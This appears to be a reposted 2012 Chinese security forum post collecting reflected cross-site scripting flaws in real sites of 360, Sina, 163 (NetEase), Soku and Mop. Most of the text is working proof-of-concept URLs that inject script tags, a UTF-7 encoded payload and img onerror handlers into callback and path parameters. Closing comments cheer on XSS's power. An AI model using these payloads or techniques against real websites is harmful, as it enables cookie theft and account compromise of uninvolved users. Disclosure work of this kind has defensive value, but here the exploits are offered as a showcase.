Author:qingsh4n

Blog:http://hi.baidu.com/new/qingsh4n

360 xss

漏洞网站:http://dev.app.360.cn

漏洞重现:http://dev.app.360.cn/seriesnum/api?appkey=02a051317dd721459824ecc8e6e77abf&status=1&product_id=Grsm_02&is_real=0&callback=%3Cscript%3Ealert%281%29%3C/script%3E

漏洞证明:

各大网站 XSS 小集合,360,Sina,163,Soku,Mop

漏洞网站:http://wangzhan.360.cn

漏洞重现:http://wangzhan.360.cn/index.php/abc/abc/abc/%22%3E%3Cscript%3Ealert%28%2fqingsh4n%2f%29%3C%2fscript%3E%2f%2f

漏洞证明:

各大网站 XSS 小集合,360,Sina,163,Soku,Mop

Sina xss

漏洞网站:http://common.fj.sina.com.cn/

漏洞重现:http://common.fj.sina.com.cn/index.php/201209room/interfaces/vote_entry?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg

漏洞证明:

各大网站 XSS 小集合,360,Sina,163,Soku,Mop。

 

漏洞网站:http://qing.weibo.com/

漏洞重现:http://qing.weibo.com/2389286414/8e699e0e34002bsw.html

漏洞证明:

各大网站 XSS 小集合,360,Sina,163,Soku,Mop。 

163 xss

漏洞网站:http://blog.163.com

漏洞重现:http://blog.163.com/s/musicWrap.s?n=%B1q%C0Y%A6A%A8%D3&a=%BCB%C5w&t=lrc&event=qingshen<img/src=1%20onerror=alert(1)>&_jsonType=2

漏洞证明:

各大网站 XSS 小集合,360,Sina,163,Soku,Mop。

Soku xss

漏洞网站:http://www.soku.com/

漏洞重现:http://www.soku.com/t/nisearch/%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E///

漏洞证明:

各大网站 XSS 小集合,360,Sina,163,Soku,Mop。


0xcodede:

有意思.MOP是我见过XSS最严重最多的。http://hi.mop.com/profile2.do?id=440492071

各大网站 XSS 小集合,360,Sina,163,Soku,Mop


摘自:https://forum.90sec.org/viewthread.php?tid=4012&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

留言评论(旧系统):

cman @ 2012-10-19 08:46:16

这个是不是意味着xss的黄金时代要来到?

本站回复:

xss 用得好的话,威力还是很爽的……